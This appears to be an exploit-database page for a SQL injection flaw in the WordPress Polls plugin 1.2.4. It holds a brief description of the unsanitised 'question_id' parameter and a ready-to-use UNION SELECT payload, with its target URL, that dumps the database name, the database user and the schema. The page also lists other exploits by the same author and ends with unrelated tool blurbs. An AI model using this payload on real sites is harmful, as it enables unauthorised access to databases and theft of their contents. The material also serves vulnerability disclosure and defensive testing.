Menu

Search for hundreds of thousands of exploits

"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)"

Author

Exploit author

"Manish Tanwar"

Platform

Exploit platform

php

Release date

Exploit published date

2017-10-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<b>Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability</b>
<br>
Vulnerable version:<=1.2.4
<br>Download Link	: https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip  

////////////////////////
<br>/// Overview:
<br>////////////////////////
<br>  
<br>WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.

  
////////////////
<br>
///  POC   ////
<br>
///////////////
 <br>
 SQL Injection payload to enumerate tables
<br>----------------------------------------------
<br>http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
<br><b>Post data</b>
<br>question_id=-3 union select  concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
 
  
POC<br>
 <img src="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true">
 <br>
  
                             --==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
<br>Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
<br>Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
 <br>
                              --==[[ Love To ]]==--
<br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
<br>Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-03-27 "TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)" remote linux "Manish Tanwar"
2018-03-02 "TestLink Open Source Test Management < 1.9.16 - Remote Code Execution" remote php "Manish Tanwar"
2017-10-22 "WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)" remote php "Manish Tanwar"
2017-07-04 "Joomla! 3.7 - SQL Injection" remote php "Manish Tanwar"
2017-02-03 "Posnic Stock Management System - SQL Injection" remote php "Manish Tanwar"
2017-01-26 "PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting" webapps php "Manish Tanwar"
2016-01-05 "Online Airline Booking System - Multiple Vulnerabilities" webapps php "Manish Tanwar"
2015-10-26 "Joomla! 3.2.x < 3.4.4 - SQL Injection" webapps php "Manish Tanwar"
2015-08-26 "Magento eCommerce - Remote Code Execution" webapps xml "Manish Tanwar"
2015-08-25 "vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection" webapps php "Manish Tanwar"
2015-06-19 "Lively Cart - SQL Injection" webapps multiple "Manish Tanwar"
2015-04-09 "WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload" webapps php "Manish Tanwar"
2015-03-22 "Joomla! Component Spider FAQ - SQL Injection" webapps php "Manish Tanwar"
2015-01-22 "ecommerceMajor - SQL Injection / Authentication Bypass" webapps php "Manish Tanwar"
2014-12-23 "PHPMyRecipes 1.2.2 - 'browse.php?category' SQL Injection" webapps php "Manish Tanwar"
2014-12-08 "PBBoard CMS - Persistent Cross-Site Scripting" webapps php "Manish Tanwar"
2014-05-20 "Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution" webapps php "Manish Tanwar"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.